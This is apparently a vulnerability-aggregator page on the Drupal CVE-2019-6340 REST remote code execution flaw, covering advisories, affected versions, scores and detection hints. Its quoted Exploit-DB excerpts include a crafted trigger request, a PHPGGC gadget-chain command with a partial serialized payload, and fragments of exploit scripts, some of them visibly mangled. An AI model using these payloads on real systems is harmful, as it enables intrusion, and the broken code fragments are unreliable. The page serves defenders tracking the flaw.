CVE-2019-6340
published 2019-02-21CVE-2019-6340: Some field types do not properly sanitize data from non-form sources in Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary…
PriorityP192high8.1CVSS 3.1
AVNACHPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-04-15
Exploited in the wild
EPSS
91.92%
99.8th percentile
Some field types do not properly sanitize data from non-form sources in Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary PHP code execution in some cases. A site is only affected by this if one of the following conditions is met: The site has the Drupal 8 core RESTful Web Services (rest) module enabled and allows PATCH or POST requests, or the site has another web services module enabled, like JSON:API in Drupal 8, or Services or RESTful Web Services in Drupal 7. (Note: The Drupal 7 Services module itself does not require an update at this time, but you should apply other contributed updates associated with this advisory if Services is in use.)
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| drupal | core | >= 7.0.0 < 7.62.0 | 7.62.0 |
| drupal | core | >= 8.0.0 < 8.5.11 | 8.5.11 |
| drupal | core | >= 8.6.0 < 8.6.10 | 8.6.10 |
| drupal | drupal | >= 7.0.0 < 7.62.0 | 7.62.0 |
| drupal | drupal | >= 8.0.0 < 8.5.11 | 8.5.11 |
| drupal | drupal | >= 8.5.0 < 8.5.11 | 8.5.11 |
| drupal | drupal | >= 8.6.0 < 8.6.10 | 8.6.10 |
| drupal | drupal | >= 8.6.0 < 8.6.10 | 8.6.10 |
| drupal | drupal_core | — | — |
| drupal | drupal_core | >= 8.5 < 8.5.11 | 8.5.11 |
| drupal | drupal_core | >= 8.6 < 8.6.10 | 8.6.10 |
Detection & IOCsextracted from sources · hover to see the quote
- →The serialized payload uses a Guzzle gadget chain generated by PHPGGC (PHP Generic Gadget Chains); look for PHPGGC-style serialized PHP objects in HTTP request bodies to Drupal REST endpoints. ↗
- →RCE via GET request without authentication is possible when RESTful Web Services, Hypertext Application Language (HAL), and HTTP Basic Authentication modules are all enabled; do not rely solely on blocking PATCH/POST. ↗
- →All REST API endpoints in affected Drupal versions are potentially vulnerable; monitor HTTP methods GET, PUT, PATCH, and POST to web services endpoints. ↗
- →Exploitation requires RESTful Web Services, HAL, and HTTP Basic Authentication modules to all be enabled; verify co-enablement of these three modules as a risk indicator. ↗
- ·Only Drupal 8.6.x < 8.6.10 and Drupal 8.5.x < 8.5.11 are affected; Drupal 7 core does not require a core update but contributed modules (RESTful Web Services, Services) may need patching. ↗
- ·Disabling PUT/PATCH/POST request types server-side is insufficient mitigation on its own because GET requests can also trigger RCE under certain module configurations. ↗
- ·The exploit requires RESTful Web Services, HAL, and HTTP Basic Authentication modules to all be simultaneously enabled; sites missing any one of these three modules could not be exploited via the GET-based PoC path. ↗
CVSS provenance
nvdv3.18.1HIGHCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vulncheck8.1HIGH
cisa8.1HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Drupal Core Remote Code Execution Vulnerability
osv·2022-05-13
CVE-2019-6340 [HIGH] Drupal Core Remote Code Execution Vulnerability
Drupal Core Remote Code Execution Vulnerability
Some field types do not properly sanitize data from non-form sources in Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary PHP code execution in some cases. A site is only affected by this if one of the following conditions is met: The site has the Drupal 8 core RESTful Web Services (rest) module enabled and allows PATCH or POST requests, or the site has another web services module enabled, like JSON:API in Drupal 8, or Services or RESTful Web Services in Drupal 7. (Note: The Drupal 7 Services module itself does not require an update at this time, but you should apply other contributed updates associated with this advisory if Services is in use.)
GHSA
Drupal Core Remote Code Execution Vulnerability
ghsa·2022-05-13
CVE-2019-6340 [HIGH] CWE-502 Drupal Core Remote Code Execution Vulnerability
Drupal Core Remote Code Execution Vulnerability
Some field types do not properly sanitize data from non-form sources in Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary PHP code execution in some cases. A site is only affected by this if one of the following conditions is met: The site has the Drupal 8 core RESTful Web Services (rest) module enabled and allows PATCH or POST requests, or the site has another web services module enabled, like JSON:API in Drupal 8, or Services or RESTful Web Services in Drupal 7. (Note: The Drupal 7 Services module itself does not require an update at this time, but you should apply other contributed updates associated with this advisory if Services is in use.)
OSV
CVE-2019-6340: Some field types do not properly sanitize data from non-form sources
osv·2019-02-20
CVE-2019-6340 CVE-2019-6340: Some field types do not properly sanitize data from non-form sources
Some field types do not properly sanitize data from non-form sources. This can lead to arbitrary PHP code execution in some cases.
A site is only affected by this if one of the following conditions is met:
* The site has the Drupal 8 core RESTful Web Services (rest) module enabled and allows **GET**, PATCH or POST requests, or
* the site has another web services module enabled, like [JSON:API](https://www.drupal.org/project/jsonapi) in Drupal 8, or [Services](https://www.drupal.org/project/services) or [RESTful Web Services](https://www.drupal.org/project/restws) in Drupal 7.
(*Note: The Drupal 7 Services module itself does not require an update at this time, but you should still apply other contributed updates associated with this advisory if Services is in use.*)
Updates
* **2019-02
VulnCheck
Drupal Core Remote Code Execution Vulnerability
vulncheck·2019·CVSS 8.1
CVE-2019-6340 [HIGH] CWE-502 Drupal Core Remote Code Execution Vulnerability
Drupal Core Remote Code Execution Vulnerability
In Drupal Core, some field types do not properly sanitize data from non-form sources. This can lead to arbitrary PHP code execution in some cases.
Affected: Drupal Drupal Core
Required Action: Apply updates per vendor instructions.
Exploitation References: https://blog.sonicwall.com/en-us/2019/12/top-cves-exploited-in-the-wild-in-the-year-2019/; https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/; https://www.lacework.com/blog/spytech-necro-keksecs-latest-python-malware/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-15&host_type=src&vulnerability=cve-2019-6340; https://dashboard.shadowserver.org/
CISA
Drupal Core Remote Code Execution Vulnerability
cisa·2022-03-25·CVSS 8.1
CVE-2019-6340 [HIGH] CWE-502 Drupal Core Remote Code Execution Vulnerability
Vulnerability: Drupal Core Remote Code Execution Vulnerability
Affected: Drupal Core
In Drupal Core, some field types do not properly sanitize data from non-form sources. This can lead to arbitrary PHP code execution in some cases.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2019-6340
Remediation Due Date: 2022-04-15
Drupal
Drupal core - Highly critical - Remote Code Execution - SA-CORE-2019-003
vendor_drupal·2019-02-20
CVE-2019-6340 [CRITICAL] Drupal core - Highly critical - Remote Code Execution - SA-CORE-2019-003
Title: Drupal core - Highly critical - Remote Code Execution - SA-CORE-2019-003
Vulnerability Type: Remote Code Execution
Description: Some field types do not properly sanitize data from non-form sources. This can lead to arbitrary PHP code execution in some cases. A site is only affected by this if one of the following conditions is met: The site has the Drupal 8 core RESTful Web Services (rest) module enabled and allows GET , PATCH or POST requests, or the site has another web services module enabled, like JSON:API in Drupal 8, or Services or RESTful Web Services in Drupal 7. ( Note: The Drupal 7 Services module itself does not require an update at this time, but you should still apply other contributed updates associated with this advisory if Services is in use. ) Updates 2019-02-22 :
No detection rules found.
Exploit-DB
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
exploitdb·2019-03-07
CVE-2019-6340 Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Drupal 'Drupal RESTful Web Services unserialize() RCE',
'Description' => %q{
This module exploits a PHP unserialize() vulnerability in Drupal RESTful
Web Services by sending a crafted request to the /node REST endpoint.
As per SA-CORE-2019-003, the initial remediation was to disable POST,
PATCH, and PUT, but Ambionics discovered that GET was also vulnerable
(albeit cached). Cached nodes can be exploited only once.
Drupal updated SA-CORE-2019-003 with PSA-2019-02-22 to notify users of
this alternate vector.
Drupal [
'Jasper Mattsson', # Discovery
'Charles Fol', # PoC
'Rotem Reiss', # Module
'wvu' # Module
],
'References' => [
['CVE', '2019-6340'],
['URL', 'https://www.drupal.org/sa-core-2019-003'],
['URL', 'https://www.drupal.org/psa-2019-02-22'],
['URL', 'https://www.ambionics.io/blog/d
Exploit-DB
Drupal < 8.6.9 - REST Module Remote Code Execution
exploitdb·2019-02-25·CVSS 8.1
CVE-2019-6340 [HIGH] Drupal < 8.6.9 - REST Module Remote Code Execution
Drupal str:
"""
Builds a URL
"""
f = ''
for x in args:
f = urljoin(f, x)
return f
def uri_valid(x: str) -> bool:
"""
https://stackoverflow.com/a/38020041
"""
result = urlparse(x)
return all([result.scheme, result.netloc, result.path])
def check_drupal_cache(r: requests.Response) -> bool:
"""
Check if a response had the cache header.
"""
if 'X-Drupal-Cache' in r.headers and r.headers['X-Drupal-Cache'] == 'HIT':
return True
return False
def find_article(base: str, f: int = 1, l: int = 100):
"""
Find a target article that does not 404 and is not cached
"""
while f bool:
"""
Check if the target is vulnerable.
"""
payload = {
"_links": {
"type": {
"href": f"{urljoin(base, '/rest/type/node/INVALID_VALUE')}"
}
},
"type": {
"target_id": "article"
},
"title": {
"value": "My Article"
},
Exploit-DB
Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution
exploitdb·2019-02-23
CVE-2019-6340 Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution
Drupal FALSE]); instead of the standard unserialize($values['options']);.
As for all FieldItemBase subclasses, LinkItem references a property type. Shortcut uses this property type, for a property named link.
Triggering the unserialize()
Having all these elements in mind, triggering an unserialize is fairly easy:
GET /drupal-8.6.9/node/1?_format=hal_json HTTP/1.1
Host: 192.168.1.25
Content-Type: application/hal+json
Content-Length: 642
{
"link": [
{
"value": "link",
"options": ""
}
],
"_links": {
"type": {
"href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default"
}
}
}
Since Drupal 8 uses Guzzle, we can generate a payload using PHPGGC:
$ ./phpggc guzzle/rce1 system id --json
"O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:
Metasploit
Drupal RESTful Web Services unserialize() RCE
metasploit
Drupal RESTful Web Services unserialize() RCE
Drupal RESTful Web Services unserialize() RCE
This module exploits a PHP unserialize() vulnerability in Drupal RESTful Web Services by sending a crafted request to the /node REST endpoint. As per SA-CORE-2019-003, the initial remediation was to disable POST, PATCH, and PUT, but Ambionics discovered that GET was also vulnerable (albeit cached). Cached nodes can be exploited only once. Drupal updated SA-CORE-2019-003 with PSA-2019-02-22 to notify users of this alternate vector. Drupal < 8.5.11 and < 8.6.10 are vulnerable.
Nuclei
Drupal - Remote Code Execution
nuclei·CVSS 8.1
CVE-2019-6340 [HIGH] Drupal - Remote Code Execution
Drupal - Remote Code Execution
Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10 V contain certain field types that do not properly sanitize data from non-form sources, which can lead to arbitrary PHP code execution in some cases.
Template:
id: CVE-2019-6340
info:
name: Drupal - Remote Code Execution
author: madrobot
severity: high
description: Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10 V contain certain field types that do not properly sanitize data from non-form sources, which can lead to arbitrary PHP code execution in some cases.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected Drupal site.
remediation: |
Apply the official security patch provided by Drupal to fix the deserialization vul
Tenable
CVE-2026-9082: Highly Critical SQL Injection Vulnerability in Drupal Core (SA-CORE-2026-004)
blogs_tenable·2026-05-21·CVSS 6.5
CVE-2026-9082 [MEDIUM] CVE-2026-9082: Highly Critical SQL Injection Vulnerability in Drupal Core (SA-CORE-2026-004)
## Exposure Management
## Explore By Use Case
## Explore By Industry
## Tenable is the one clear leader in Exposure Management
## Exposure management
resource center
## Accelerate your exposure management strategy with practical resources and tools.
## Explore By Use Case
## Explore By Industry
## Tenable is the one clear leader in Exposure Management
## Exposure management
resource center
## Accelerate your exposure management strategy with practical resources and tools.
## CVE-2026-9082: Highly Critical SQL Injection Vulnerability in Drupal Core (SA-CORE-2026-004)
A highly critical SQL injection vulnerability in Drupal core's database abstraction layer affects sites running PostgreSQL.
## Key Takeaways
CVE-2026-9082 is a highly critical SQL injection vulnerabi
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
CVE-2020-28188 [HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a dive deep into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
[HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Internet of Threats (November 2020-January 2021)
Lei Xu
Yue Guan
Vaibhav Singhal
Published: April 12, 2021
Malware
Trend Reports
Vulnerabilities
Botnet
DDoS
Exploit kit
IoT
Network security trends
## Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020 . Several newly observed exploits, including CVE-2020-28188 , CVE-2020-17519 , and CVE-2020-29227 , have emerged and were continuously being exploited in the wild as of late 2020 to earl
Trendmicro
Schwachstelle in Drupal
blogs_trendmicro·2019-03-01·CVSS 8.1
CVE-2019-6340 [HIGH] Schwachstelle in Drupal
Ausnutzung von Schwachstellen
## Schwachstelle in Drupal
Im Content Management Framework Drupal wurde kürzlich eine Sicherheitslücke (CVE-2019-6340) in der Kernsoftware geschlossen. Nutzer sollten updaten.
By: Branden Lynch Mar 01, 2019 Read time: ( words)
Save to Folio
Originalbeitrag von Branden Lynch, Threats Analyst
Im Content Management Framework Drupal wurde kürzlich eine Sicherheitslücke ( CVE-2019-6340 ) in der Kernsoftware geschlossen. Der Fehler war als „hochkritisch“ eingestuft worden, denn Installationen sind der Gefahr von nicht autorisierter Remote Code Execution ausgesetzt. Die Lücke betrifft einen erheblichen Anteil an Drupal-Installationen, denn sie wirkt sich auf das häufig eingesetzte RESTful Web Services (rest)-Modul aus. Die folgenden Vorbedingungen sind für die
Trendmicro
Drupal Vulnerability Can Be Exploited for RCE Attacks
blogs_trendmicro·2019-02-27·CVSS 8.1
CVE-2019-6340 [HIGH] Drupal Vulnerability Can Be Exploited for RCE Attacks
Exploits & Vulnerabilities
# Drupal Vulnerability Can Be Exploited for RCE Attacks
The content management framework Drupal recently fixed a vulnerability (CVE-2019-6340) in their core software, identified as SA-CORE-2019-003. The flaw is exposed vulnerable installations to unauthenticated remote code execution (RCE).
By: Branden Lynch
2019/02/27
Read time: ( words)
Save to Folio
The content management framework Drupal recently fixed a vulnerability (CVE-2019-6340) in their core software, identified as SA-CORE-2019-003. The flaw is categorized as highly critical, exposing vulnerable installations to unauthenticated remote code execution (RCE). The vulnerability affects a substantial portion of Drupal installations, since it impacts the widely installed RESTful Web Services (rest) modu
Trendmicro
Drupal Vulnerability Can Be Exploited for RCE Attacks
blogs_trendmicro·2019-02-27·CVSS 8.1
CVE-2019-6340 [HIGH] Drupal Vulnerability Can Be Exploited for RCE Attacks
Exploits & Vulnerabilities
## Drupal Vulnerability Can Be Exploited for RCE Attacks
The content management framework Drupal recently fixed a vulnerability (CVE-2019-6340) in their core software, identified as SA-CORE-2019-003. The flaw is exposed vulnerable installations to unauthenticated remote code execution (RCE).
By: Branden Lynch 2019/02/27 Read time: ( words)
Save to Folio
The content management framework Drupal recently fixed a vulnerability ( CVE-2019-6340 ) in their core software, identified as SA-CORE-2019-003 . The flaw is categorized as highly critical, exposing vulnerable installations to unauthenticated remote code execution (RCE). The vulnerability affects a substantial portion of Drupal installations, since it impacts the widely installed RESTful Web Services (rest) m
Trendmicro
Drupal Vulnerability Can Be Exploited for RCE Attacks
blogs_trendmicro·2019-02-27·CVSS 8.1
CVE-2019-6340 [HIGH] Drupal Vulnerability Can Be Exploited for RCE Attacks
Exploits & Vulnerabilities
# Drupal Vulnerability Can Be Exploited for RCE Attacks
The content management framework Drupal recently fixed a vulnerability (CVE-2019-6340) in their core software, identified as SA-CORE-2019-003. The flaw is exposed vulnerable installations to unauthenticated remote code execution (RCE).
By: Branden Lynch
Feb 27, 2019
Read time: ( words)
Save to Folio
The content management framework Drupal recently fixed a vulnerability (CVE-2019-6340) in their core software, identified as SA-CORE-2019-003. The flaw is categorized as highly critical, exposing vulnerable installations to unauthenticated remote code execution (RCE). The vulnerability affects a substantial portion of Drupal installations, since it impacts the widely installed RESTful Web Services (rest) mo
Trendmicro
Drupal Vulnerability Can Be Exploited for RCE Attacks
blogs_trendmicro·2019-02-27·CVSS 8.1
CVE-2019-6340 [HIGH] Drupal Vulnerability Can Be Exploited for RCE Attacks
Exploits y vulnerabilidades
## Drupal Vulnerability Can Be Exploited for RCE Attacks
The content management framework Drupal recently fixed a vulnerability (CVE-2019-6340) in their core software, identified as SA-CORE-2019-003. The flaw is exposed vulnerable installations to unauthenticated remote code execution (RCE).
By: Branden Lynch Feb 27, 2019 Read time: ( words)
Save to Folio
The content management framework Drupal recently fixed a vulnerability ( CVE-2019-6340 ) in their core software, identified as SA-CORE-2019-003 . The flaw is categorized as highly critical, exposing vulnerable installations to unauthenticated remote code execution (RCE). The vulnerability affects a substantial portion of Drupal installations, since it impacts the widely installed RESTful Web Services (rest
Trendmicro
Drupal Vulnerability Can Be Exploited for RCE Attacks
blogs_trendmicro·2019-02-27·CVSS 8.1
CVE-2019-6340 [HIGH] Drupal Vulnerability Can Be Exploited for RCE Attacks
Exploits & Vulnerabilities
## Drupal Vulnerability Can Be Exploited for RCE Attacks
The content management framework Drupal recently fixed a vulnerability (CVE-2019-6340) in their core software, identified as SA-CORE-2019-003. The flaw is exposed vulnerable installations to unauthenticated remote code execution (RCE).
By: Branden Lynch Feb 27, 2019 Read time: ( words)
Save to Folio
The content management framework Drupal recently fixed a vulnerability ( CVE-2019-6340 ) in their core software, identified as SA-CORE-2019-003 . The flaw is categorized as highly critical, exposing vulnerable installations to unauthenticated remote code execution (RCE). The vulnerability affects a substantial portion of Drupal installations, since it impacts the widely installed RESTful Web Services (rest)
Trendmicro
Drupal Vulnerability Can Be Exploited for RCE Attacks
blogs_trendmicro·2019-02-27·CVSS 8.1
CVE-2019-6340 [HIGH] Drupal Vulnerability Can Be Exploited for RCE Attacks
Sfruttamento vulnerabilità
## Drupal Vulnerability Can Be Exploited for RCE Attacks
The content management framework Drupal recently fixed a vulnerability (CVE-2019-6340) in their core software, identified as SA-CORE-2019-003. The flaw is exposed vulnerable installations to unauthenticated remote code execution (RCE).
By: Branden Lynch Feb 27, 2019 Read time: ( words)
Save to Folio
The content management framework Drupal recently fixed a vulnerability ( CVE-2019-6340 ) in their core software, identified as SA-CORE-2019-003 . The flaw is categorized as highly critical, exposing vulnerable installations to unauthenticated remote code execution (RCE). The vulnerability affects a substantial portion of Drupal installations, since it impacts the widely installed RESTful Web Services (rest)
Tenable
Highly Critical Drupal Security Advisory Released (SA-CORE-2019-003)
blogs_tenable·2019-02-20·CVSS 8.1
CVE-2019-6340 [HIGH] Highly Critical Drupal Security Advisory Released (SA-CORE-2019-003)
Blog / Cyber Exposure Alerts
Subscribe
# Highly Critical Drupal Security Advisory Released (SA-CORE-2019-003)
Satnam Narang
February 20, 2019
3 Min Read
Drupal has released a security advisory to address a critical remote code execution vulnerability (CVE-2019-6340).
### Background
On February 20, Drupal released a security advisory (SA-CORE-2019-003) for CVE-2019-6340, a remote code execution vulnerability in its software. This vulnerability has received a security risk rating of Highly Critical as defined by Drupal.
### Analysis
According to the security advisory, arbitrary PHP code execution is possible due to a lack of data sanitization in certain field types linked to non-form sources. However, specific site configurations are affected by this vulnerability.
Affected Configu
Tenable
Highly Critical Drupal Security Advisory Released (SA-CORE-2019-003)
blogs_tenable·2019-02-20
Highly Critical Drupal Security Advisory Released (SA-CORE-2019-003)
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Greynoiseio
NoiseLetter April 2024
blogs_greynoiseio
NoiseLetter April 2024
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Bugzilla
CVE-2019-6340 drupal: does not sanitize data from non-form sources leads to arbitrary PHP code execution
bugzilla·2019-02-22·CVSS 8.1
CVE-2019-6340 [HIGH] CVE-2019-6340 drupal: does not sanitize data from non-form sources leads to arbitrary PHP code execution
CVE-2019-6340 drupal: does not sanitize data from non-form sources leads to arbitrary PHP code execution
Some field types do not properly sanitize data from non-form sources in Drupal 8.5.x before 8.5.11 and Drupal 8.6.x before 8.6.10. This can lead to arbitrary PHP code execution in some cases. A site is only affected by this if one of the following conditions is met: The site has the Drupal 8 core RESTful Web Services (rest) module enabled and allows PATCH or POST requests, or the site has another web services module enabled, like JSON:API in Drupal 8, or Services or RESTful Web Services in Drupal 7.
Reference:
https://www.drupal.org/sa-core-2019-003
Discussion:
Created drupal tracking bugs for this issue:
Affects: fedora-all [bug 1679949]
---
This CVE Bugzilla entry is for commun
Bugzilla
CVE-2019-6340 drupal: does not sanitize data from non-form sources leads to arbitrary PHP code execution [fedora-all]
bugzilla·2019-02-22·CVSS 8.1
CVE-2019-6340 [HIGH] CVE-2019-6340 drupal: does not sanitize data from non-form sources leads to arbitrary PHP code execution [fedora-all]
CVE-2019-6340 drupal: does not sanitize data from non-form sources leads to arbitrary PHP code execution [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
NOTE: this i
arXiv
Hybrid Privilege Escalation and Remote Code Execution Exploit Chains
arxiv_fulltext·2025-09-22
Hybrid Privilege Escalation and Remote Code Execution Exploit Chains
Exploit Classification
Modeling
AI Planning
ALFA-Chains
RCE
Core Certified Exploit Library
DMZ+LAN
20+6subs
200+6subs
Purdue_1
Purdue_2
Purdue_3
Synthetic
H0
H1
H2
Hybrid Privilege Escalation and Remote Code Execution Exploit Chains
Miguel Tulla
MIT
Cambridge, MA
Email: [email protected]
Andrea Vignali
University of Naples Federico II
Naples, Italy
Email: [email protected]
Cristian Colon
MIT
Cambridge, MA
Email: [email protected]
Anahita Srinivasan
MIT
Cambridge, MA
Email: [email protected]
Giancarlo Sperlì
University of Naples Federico II
Naples, Italy
Email: [email protected]
Simon Pietro Romano
University of Naples Federico II
Naples, Italy
Email: [email protected]
Masataro Asai
MIT-IBM Watson AI Lab
Cambridge, MA
Email: [email protected]
Erik Hemberg
http://www.securityfocus.com/bid/107106https://www.drupal.org/sa-core-2019-003https://www.exploit-db.com/exploits/46452/https://www.exploit-db.com/exploits/46459/https://www.exploit-db.com/exploits/46510/https://www.synology.com/security/advisory/Synology_SA_19_09http://www.securityfocus.com/bid/107106https://www.drupal.org/sa-core-2019-003https://www.exploit-db.com/exploits/46452/https://www.exploit-db.com/exploits/46459/https://www.exploit-db.com/exploits/46510/https://www.synology.com/security/advisory/Synology_SA_19_09https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-6340
2019-02-21
Published
2022-03-25
Added to CISA KEV
Exploited in the wild